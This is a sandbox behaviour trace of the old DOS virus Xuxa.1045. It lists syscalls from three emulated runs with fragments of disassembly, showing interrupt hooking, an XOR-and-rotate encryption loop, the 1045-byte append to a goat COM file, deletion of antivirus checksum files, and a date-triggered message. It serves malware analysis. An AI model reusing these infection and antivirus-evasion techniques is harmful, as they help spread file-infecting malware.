vx.netlux.org/Virus.DOS.Xuxa.1045

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:57:54.841944126Z 11 PC: 12bba | Get input status
2018-12-17T22:57:54.845184497Z 250 PC: 12f96 | UNKNOWN!
2018-12-17T22:57:54.847349116Z 53 PC: 12cea | Get interrupt vector (Interrupt = '75' AKA 'Execute program')
2018-12-17T22:57:54.84898984Z 53 PC: 12d0f | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:57:54.8506706Z 74 PC: 12d32 | Reallocate memory
2018-12-17T22:57:54.853157344Z 72 PC: 12d38 | Allocate memory
2018-12-17T22:57:54.855242423Z 37 PC: 12d60 | Set interrupt vector (Interrupt = '75' AKA 'Execute program')
2018-12-17T22:57:54.856603973Z 37 PC: 12d6a | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:57:54.85847513Z 42 PC: 9f4f3 | Get date
0x9f4f3: cmp dh, 3
0x9f4f6: jne 0x9f4fb
0x9f4f8: jmp 0x9f6ea
0x9f4fb: pop dx
0x9f4fc: mov si, dx
0x9f4fe: push cs
0x9f4ff: pop es
0x9f500: mov cx, 0x41
0x9f503: mov al, byte ptr [si]
0x9f505: cmp al, 0
0x9f507: je 0x9f510
0x9f509: inc si
0x9f50a: dec cx
0x9f50b: jne 0x9f503
0x9f50d: jmp 0x9f522
0x9f50f: nop
0x9f510: mov cx, 0xb
0x9f513: mov di, 0x1fc
0x9f516: sub si, 0xb
0x9f519: repe cmpsb byte ptr [si], byte ptr es:[di]
2018-12-17T22:57:54.861324897Z 250 PC: 9f6e9 | UNKNOWN!
2018-12-17T22:57:54.862412451Z 53 PC: 9f531 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:57:54.864042596Z 37 PC: 9f545 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:57:54.866170306Z 67 PC: 9f6d2 | Get or set file attributes
2018-12-17T22:57:54.875887662Z 67 PC: 9f6df | Get or set file attributes
2018-12-17T22:57:55.220943535Z 61 PC: 9f55a | Open file (Filename = '')
2018-12-17T22:57:55.229332645Z 87 PC: 9f561 | Get or set file date and time
2018-12-17T22:57:55.231254648Z 63 PC: 9f57a | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:57:55.23757621Z 66 PC: 9f6ca | Move file pointer
2018-12-17T22:57:55.240010406Z 44 PC: 9f5a4 | Get time
0x9f5a4: xor dh, dh
0x9f5a6: mov byte ptr cs:[0x117], dl
0x9f5ab: push bx
0x9f5ac: push cs
0x9f5ad: push cs
0x9f5ae: pop ds
0x9f5af: pop es
0x9f5b0: mov si, 0x100
0x9f5b3: mov di, 0x516
0x9f5b6: mov cx, 0x4e
0x9f5b9: rep movsb byte ptr es:[di], byte ptr [si]
0x9f5bb: mov dl, byte ptr [0x117]
0x9f5bf: mov cx, 0x3c7
0x9f5c2: mov al, byte ptr [si]
0x9f5c4: ror al, 5
0x9f5c7: xor al, dl
0x9f5c9: mov byte ptr es:[di], al
0x9f5cc: inc si
0x9f5cd: inc di
0x9f5ce: dec cx
2018-12-17T22:57:55.242992772Z 64 PC: 9f5dc | Write file or device (Write 1045 bytes on handle 5)
2018-12-17T22:57:55.252085354Z 66 PC: 9f6ca | Move file pointer
2018-12-17T22:57:55.254985757Z 64 PC: 9f5eb | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:57:55.258654833Z 87 PC: 9f602 | Get or set file date and time
2018-12-17T22:57:55.260502096Z 67 PC: 9f6df | Get or set file attributes
2018-12-17T22:57:55.271474271Z 65 PC: 9f649 | Delete file (Filename = 'C:\DOS\CHKLIST.MS')
2018-12-17T22:57:55.278308377Z 67 PC: 9f6df | Get or set file attributes
2018-12-17T22:57:55.284811462Z 65 PC: 9f649 | Delete file (Filename = 'C:\DOS\ANTI-VIR.DAT')
2018-12-17T22:57:55.292572651Z 62 PC: 9f65d | Close file
2018-12-17T22:57:55.314225323Z 67 PC: 9f6df | Get or set file attributes
2018-12-17T22:57:55.324740539Z 37 PC: 9f673 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:57:55.326020144Z 53 PC: 9f678 | Get interrupt vector (Interrupt = '75' AKA 'Execute program')
2018-12-17T22:57:55.32835344Z 250 PC: 9f6e9 | UNKNOWN!
2018-12-17T22:57:55.330431025Z 37 PC: 12d7d | Set interrupt vector (Interrupt = '75' AKA 'Execute program')
2018-12-17T22:57:55.332076077Z 250 PC: 12f96 | UNKNOWN!
2018-12-17T22:57:55.33376375Z 250 PC: 12f96 | UNKNOWN!
2018-12-17T22:57:55.334811619Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-17T22:57:55.339106924Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12713,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:36:05.350046053Z 11 PC: 12bba | Get input status
2018-12-25T12:36:05.353465455Z 250 PC: 12f96 | UNKNOWN!
2018-12-25T12:36:05.354145005Z 53 PC: 12cea | Get interrupt vector (Interrupt = '75' AKA 'Execute program')
2018-12-25T12:36:05.355210067Z 53 PC: 12d0f | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:36:05.356879755Z 74 PC: 12d32 | Reallocate memory
2018-12-25T12:36:05.358226329Z 72 PC: 12d38 | Allocate memory
2018-12-25T12:36:05.359657686Z 37 PC: 12d60 | Set interrupt vector (Interrupt = '75' AKA 'Execute program')
2018-12-25T12:36:05.368129457Z 37 PC: 12d6a | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:36:05.36980922Z 42 PC: 9f4f3 | Get date
0x9f4f3: cmp dh, 3
0x9f4f6: jne 0x9f4fb
0x9f4f8: jmp 0x9f6ea
0x9f4fb: pop dx
0x9f4fc: mov si, dx
0x9f4fe: push cs
0x9f4ff: pop es
0x9f500: mov cx, 0x41
0x9f503: mov al, byte ptr [si]
0x9f505: cmp al, 0
0x9f507: je 0x9f510
0x9f509: inc si
0x9f50a: dec cx
0x9f50b: jne 0x9f503
0x9f50d: jmp 0x9f522
0x9f50f: nop
0x9f510: mov cx, 0xb
0x9f513: mov di, 0x1fc
0x9f516: sub si, 0xb
0x9f519: repe cmpsb byte ptr [si], byte ptr es:[di]
2018-12-25T12:36:05.373781651Z 250 PC: 9f6e9 | UNKNOWN!
2018-12-25T12:36:05.376393158Z 53 PC: 9f531 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:36:05.377894995Z 37 PC: 9f545 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:36:05.37947283Z 67 PC: 9f6d2 | Get or set file attributes
2018-12-25T12:36:05.389095437Z 67 PC: 9f6df | Get or set file attributes
2018-12-25T12:36:05.72770917Z 61 PC: 9f55a | Open file (Filename = '')
2018-12-25T12:36:05.734520341Z 87 PC: 9f561 | Get or set file date and time
2018-12-25T12:36:05.736030648Z 63 PC: 9f57a | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:36:05.741865986Z 66 PC: 9f6ca | Move file pointer
2018-12-25T12:36:05.748240504Z 44 PC: 9f5a4 | Get time
0x9f5a4: xor dh, dh
0x9f5a6: mov byte ptr cs:[0x117], dl
0x9f5ab: push bx
0x9f5ac: push cs
0x9f5ad: push cs
0x9f5ae: pop ds
0x9f5af: pop es
0x9f5b0: mov si, 0x100
0x9f5b3: mov di, 0x516
0x9f5b6: mov cx, 0x4e
0x9f5b9: rep movsb byte ptr es:[di], byte ptr [si]
0x9f5bb: mov dl, byte ptr [0x117]
0x9f5bf: mov cx, 0x3c7
0x9f5c2: mov al, byte ptr [si]
0x9f5c4: ror al, 5
0x9f5c7: xor al, dl
0x9f5c9: mov byte ptr es:[di], al
0x9f5cc: inc si
0x9f5cd: inc di
0x9f5ce: dec cx
2018-12-25T12:36:05.751646637Z 64 PC: 9f5dc | Write file or device (Write 1045 bytes on handle 5)
2018-12-25T12:36:05.758320132Z 66 PC: 9f6ca | Move file pointer (See above)
2018-12-25T12:36:05.759503944Z 64 PC: 9f5eb | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:36:05.76150698Z 87 PC: 9f602 | Get or set file date and time
2018-12-25T12:36:05.763301459Z 67 PC: 9f6df | Get or set file attributes (See above)
2018-12-25T12:36:05.769057437Z 65 PC: 9f649 | Delete file (Filename = 'C:\DOS\CHKLIST.MS')
2018-12-25T12:36:05.773836727Z 67 PC: 9f6df | Get or set file attributes (See above)
2018-12-25T12:36:05.778408591Z 65 PC: 9f649 | Delete file (See above)
2018-12-25T12:36:05.782709428Z 62 PC: 9f65d | Close file
2018-12-25T12:36:05.788369671Z 67 PC: 9f6df | Get or set file attributes (See above)
2018-12-25T12:36:05.797710714Z 37 PC: 9f673 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:36:05.799654976Z 53 PC: 9f678 | Get interrupt vector (Interrupt = '75' AKA 'Execute program')
2018-12-25T12:36:05.803911951Z 250 PC: 9f6e9 | UNKNOWN! (See above)
2018-12-25T12:36:05.805375246Z 37 PC: 12d7d | Set interrupt vector (Interrupt = '75' AKA 'Execute program')
2018-12-25T12:36:05.806556311Z 250 PC: 12f96 | UNKNOWN! (See above)
2018-12-25T12:36:05.807345359Z 250 PC: 12f96 | UNKNOWN! (See above)
2018-12-25T12:36:05.808718183Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:36:05.814231962Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":3,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":12713,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:36:05.364272518Z 11 PC: 12bba | Get input status
2018-12-25T12:36:05.371484628Z 250 PC: 12f96 | UNKNOWN!
2018-12-25T12:36:05.372531253Z 53 PC: 12cea | Get interrupt vector (Interrupt = '75' AKA 'Execute program')
2018-12-25T12:36:05.373707092Z 53 PC: 12d0f | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:36:05.375592027Z 74 PC: 12d32 | Reallocate memory
2018-12-25T12:36:05.377285979Z 72 PC: 12d38 | Allocate memory
2018-12-25T12:36:05.379096079Z 37 PC: 12d60 | Set interrupt vector (Interrupt = '75' AKA 'Execute program')
2018-12-25T12:36:05.380747884Z 37 PC: 12d6a | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:36:05.3830424Z 42 PC: 9f4f3 | Get date
0x9f4f3: cmp dh, 3
0x9f4f6: jne 0x9f4fb
0x9f4f8: jmp 0x9f6ea
0x9f4fb: pop dx
0x9f4fc: mov si, dx
0x9f4fe: push cs
0x9f4ff: pop es
0x9f500: mov cx, 0x41
0x9f503: mov al, byte ptr [si]
0x9f505: cmp al, 0
0x9f507: je 0x9f510
0x9f509: inc si
0x9f50a: dec cx
0x9f50b: jne 0x9f503
0x9f50d: jmp 0x9f522
0x9f50f: nop
0x9f510: mov cx, 0xb
0x9f513: mov di, 0x1fc
0x9f516: sub si, 0xb
0x9f519: repe cmpsb byte ptr [si], byte ptr es:[di]
2018-12-25T12:36:05.385481303Z 9 PC: 9f6f1 | Display string (String= 'Si no viste el Show de Xuxa por T.V, ni en vivo... ahora podes verlo en tu PC!. - XOU DA XUXA 1.3 By Leviathan.')